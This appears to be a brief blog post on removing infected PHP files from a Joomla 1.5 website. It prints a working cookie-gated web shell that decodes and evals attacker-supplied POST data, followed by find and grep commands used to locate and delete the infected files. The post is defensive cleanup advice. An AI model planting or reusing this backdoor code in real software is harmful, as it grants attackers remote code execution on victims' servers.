How I removed infected PHP files from Joomla 1.5 wesite.

I noticed that there are some suspicious PHP files with the following content on my Joomla 1.5 website:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}

I used the following commands to list them and remove them:

find -type f -name "*.php" -printf '%T@ %p\n' | sort -r | awk '{print $2}' | xargs ls -l | less -N
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs ls -l
grep --color -r -i -l "3469825000034634" . --include=*.{php,css,html} | xargs rm

Leave a Reply

Your email address will not be published. Required fields are marked *